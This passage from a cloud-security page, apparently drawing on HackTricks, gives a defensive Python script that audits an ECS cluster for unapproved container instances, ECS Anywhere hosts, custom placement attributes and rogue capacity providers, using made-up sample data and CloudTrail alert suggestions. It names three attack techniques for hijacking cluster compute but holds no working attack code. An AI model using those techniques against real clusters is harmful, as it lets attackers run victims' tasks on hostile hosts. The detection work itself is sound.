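The three techniques above (registering a container instance by hand, attaching a malicious capacity provider, and registering an ECS Anywhere EXTERNAL host) all end the same way: compute the cluster owner never provisioned is serving the cluster's tasks. The following Python is an added example for this page, not HackTricks' code: it compares `describe-container-instances` and `describe-clusters` output (constructed here) against the approved ASG membership and the approved capacity-provider list, and also surfaces custom container-instance attributes of the kind used to satisfy placement constraints. Every ID, ARN and name is made up; the code additionally assumes that ECS Anywhere hosts advertise the `ecs.capability.external` attribute and report an SSM managed-instance ID (`mi-...`) instead of an `i-...` ID, both marked as assumptions in the comments.

```python
"""Audit an ECS cluster for compute outside the approved fleet.
Added example for this page; not HackTricks' code."""
import json

# Approved sources of compute (constructed): instance IDs from the real ASG(s)
# and the capacity providers the platform team created.
EXPECTED_INSTANCE_IDS = {"i-0aaa1111aaaa1111a", "i-0bbb2222bbbb2222b"}
APPROVED_CAPACITY_PROVIDERS = {"prod-cp"}
# Attribute names ECS sets itself; anything else was supplied at registration time.
BUILTIN_ATTR_PREFIXES = ("ecs.", "com.amazonaws.ecs.")

# Constructed describe-container-instances / describe-clusters style input.
SAMPLE_CONTAINER_INSTANCES = [
    {"ec2InstanceId": "i-0aaa1111aaaa1111a", "status": "ACTIVE",
     "attributes": [{"name": "ecs.instance-type", "value": "t3.medium"},
                    {"name": "com.amazonaws.ecs.capability.docker-remote-api.1.17"}]},
    {"ec2InstanceId": "i-0ccc3333cccc3333c", "status": "ACTIVE",       # unknown EC2 host
     "attributes": [{"name": "ecs.instance-type", "value": "t3.small"},
                    {"name": "labtarget", "value": "hijack"}]},
    {"ec2InstanceId": "mi-0123456789abcdef0", "status": "ACTIVE",      # ECS Anywhere host
     "attributes": [{"name": "ecs.capability.external"}]},
]
SAMPLE_CLUSTER = {
    "clusterName": "ht-victim-cluster",
    "capacityProviders": ["prod-cp", "htcp-8797"],
    "defaultCapacityProviderStrategy": [{"capacityProvider": "htcp-8797", "weight": 1}],
}


def audit_container_instances(instances, expected_ids):
    """Return (instanceId, finding) pairs for hosts that should not be serving tasks."""
    findings = []
    for ci in instances:
        iid = ci.get("ec2InstanceId", "")
        attrs = {a["name"]: a.get("value") for a in ci.get("attributes", [])}
        # Assumption: EXTERNAL hosts carry ecs.capability.external and an SSM "mi-" ID.
        if "ecs.capability.external" in attrs or iid.startswith("mi-"):
            findings.append((iid, "EXTERNAL (ECS Anywhere) host registered"))
        elif iid not in expected_ids:
            findings.append((iid, "EC2 host not in approved ASG membership"))
        custom = sorted(k for k in attrs if not k.startswith(BUILTIN_ATTR_PREFIXES))
        if custom:   # attributes a registrant could set to satisfy placement constraints
            findings.append((iid, "custom attributes: " + ", ".join(f"{k}={attrs[k]}" for k in custom)))
    return findings


def audit_capacity_providers(cluster, approved):
    """Flag providers attached to the cluster, or in its default strategy, that were not approved."""
    findings = []
    for cp in cluster.get("capacityProviders", []):
        if cp not in approved:
            findings.append((cp, "unapproved capacity provider attached to cluster"))
    for strat in cluster.get("defaultCapacityProviderStrategy", []):
        if strat.get("capacityProvider") not in approved:
            findings.append((strat["capacityProvider"], "unapproved provider in default strategy"))
    return findings


if __name__ == "__main__":
    print(json.dumps({
        "container_instances": audit_container_instances(SAMPLE_CONTAINER_INSTANCES, EXPECTED_INSTANCE_IDS),
        "capacity_providers": audit_capacity_providers(SAMPLE_CLUSTER, APPROVED_CAPACITY_PROVIDERS),
    }, indent=2))
```

The expected instance set is best derived from `describe-auto-scaling-groups` for the ASGs behind the approved providers rather than maintained by hand; a scheduled run of both checks, together with CloudTrail alerts on RegisterContainerInstance, CreateCapacityProvider, PutClusterCapacityProviders and ssm CreateActivation, covers the registration step of all three techniques.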